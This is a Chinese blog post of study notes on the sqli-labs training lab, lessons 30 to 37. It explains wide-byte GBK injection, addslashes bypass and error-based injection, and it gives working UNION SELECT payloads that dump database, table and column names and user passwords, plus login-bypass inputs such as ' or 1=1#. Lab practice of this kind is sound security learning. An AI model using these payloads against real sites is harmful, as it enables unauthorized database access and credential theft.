sqli-labs学习笔记 DAY6
2024-09-21 15:53:19
DAY 6
sqli-labs lesson 30
- 与上一题一样,需要用到HPP
- 查看源代码,参数两边加上了双引号,直接使用lesson 26a与lesson 27a的脚本即可
sqli-labs lesson 31
- 闭合符号为双引号加括号
- 直接报错型注入
sqli-labs lesson 32(Jsp)
- 这一题直接用Jsp处理的一个参数即可
- 闭合符号为单引号与括号,直接报错注入
sqli-labs lesson 32(php)
- 宽字节注入:https://www.cnblogs.com/xishaonian/p/6063961.html
- 思路:由源码,这道题过滤单引号,并且形成’这样的字符,所以我们的想法就是把\“吃掉”或者在他前面再加一个\。'的十六进制为0x5c,0x25所以URL编码为%5c%27,可以在前面加一个%df,形成%df%5c%27,也就是输入参数时,提交%df%27,过滤后形成三个字符,这三个字符在SQL中,因为编码设置为GBK,所以前面两个%df%5c会形成一个汉字,这样,%27就独立出来了。
- 其他的直接使用联合查询语句即可
sqli-labs lesson 33
- addslashes():
addslashes() 函数在指定的预定义字符前添加反斜杠。这些字符是单引号(’)、双引号(")、反斜线(\)与NUL(NULL字符)。
- 和上一题一样
sqli-labs lesson 34
- 这一关是POST方式
- 用户名输入:饜’ or 1=1#
- 其中饜是utf-16位995c的汉字,分成其中5c转换成utf-8就是\,相当于我们在\之前又加了一个\来让他失效了
sqli-labs lesson 35
- 爆库:?id=99 UNION SELECT 1,database(),3;–+
- 爆表:?id=99 UNION SELECT 1,group_concat(table_name),3 from information_schema.tables where table_schema=CHAR(115, 101, 99, 117, 114, 105, 116, 121);–+
- 爆字段:?id=99 UNION SELECT 1,group_concat(column_name),3 from information_schema.columns where table_schema=CHAR(115, 101, 99, 117, 114, 105, 116, 121) and table_name=CHAR(117, 115, 101, 114, 115);–+
- 爆记录:?id=99 UNION SELECT 1,group_concat(username),group_concat(password) from security.users;–+
sqli-labs lesson 36
- 宽字节注入,这次用FEFF335c,这是一个有意思的字符,长的这个样子:㍜
- 检测:?id=99㍜’ UNION SELECT 1,2,3;–+
- 其他引号用CHAR()函数绕过
sqli-labs lesson 37
- 和上一题一样,只不过这次是POST
- 用户名:㍜’ or 1=1;#
最新文章
- JavaScript自定义浏览器滚动条兼容IE、 火狐和chrome
- ecshop商品子分类点击下拉,子分类空时,直接跳转功能
- java打包成jar,但不打包配置文件
- 关于无法把程序(Adobe Fireworks CS5)添加到打开方式的解决办法
- [BZOJ1856][SCOI2010]字符串(组合数学)
- C++ Primer : 第九章 : 顺序容器的定义、迭代器以及赋值与swap
- Spring和Struct整合的三个方法
- Apache Rewrite 拟静态配置54
- 九章算法系列(#4 Dynamic Programming)-课堂笔记
- Nginx 配置指令的执行顺序(七)
- POJ 2250(最长公共子序列 变形)
- FineUIMvc
- 让git不再跟踪配置文件的变化
- Android Widget小组件开发(一)——Android实现时钟Widget组件的步骤开发,这些知识也是必不可少的!
- 使用代码刷QQ的跨年红包
- pads layout 自动打地孔
- 【Python】Python3纯代码极简教程
- 用doxygen自动生成文档
- 求最大流dinic算法模板
- dev gridview自动列宽和单元、行、checkbox选中和多选
热门文章
- Python 2.7和3.6爬取妹子图网站单页测试图片
- 清除SQL server 记住的用户名和密码
- Java泛型学习一
- vmvare安装系统提示vmci.sys 版本不正确解决方法
- U盘安装咱中国人自己的操作系统UbuntuKylin14.04LST(超具体原创图文教程)
- 第一章:AI人工智能 の 数据预处理编程实战 Numpy, Pandas, Matplotlib, Scikit-Learn
- 转载:【架构师之路】依赖注入原理---IoC框架
- JS实现图片的淡入和淡出的两种方法,如有不足,还请前辈多多指导^-^~
- Ubuntu 18.04安装MongoDB 4.0
- Python2.7在Windows下CMD编码为65001/utf-8时print报错[Errno 0]/[Errno 2]